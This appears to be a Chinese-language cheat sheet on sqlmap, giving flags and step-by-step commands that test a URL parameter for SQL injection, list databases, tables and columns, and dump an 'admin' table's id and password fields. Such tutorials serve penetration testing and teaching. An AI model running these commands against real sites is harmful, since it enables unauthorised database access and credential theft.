🔥码云GVP开源项目 12k star Uniapp+ElementUI 功能强大 支持多语言、二开方便! 广告
使用-u参数, -u URL 爆所有数据库信息 -- dbs 爆当前数据库信息 --current-dbs 指定数据库的名字列出所有的表 -D 数据库名 --tables 指定数据库的表列出所有的字段 -D 数据库名 -T 表名 --columns 指定数据库名, 表名字段 dump出指定字段 -D 数据库名 -T 表名 -C 字段名 --dump # 检查注入点: sqlmap -u http://aa.com/star\_photo.php?artist\_id=11 # 爆所有数据库信息: sqlmap -u http://aa.com/star\_photo.php?artist\_id=11 --dbs # 爆当前数据库信息: sqlmap -u http://aa.com/star\_photo.php?artist\_id=11 --current-db # 指定库名列出所有表 sqlmap -u http://aa.com/star\_photo.php?artist\_id=11 -D vhost48330 --tables 'vhost48330' 为指定数据库名称 # 指定库名表名列出所有字段 sqlmap -u http://aa.com/star\_photo.php?artist\_id=11 -D vhost48330 -T admin --columns 'admin' 为指定表名称 # 指定库名表名字段dump出指定字段 sqlmap -u http://aa.com/star\_photo.php?artist\_id=11 -D vhost48330 -T admin -C ac,id,password --dump 'ac,id,password' 为指定字段名称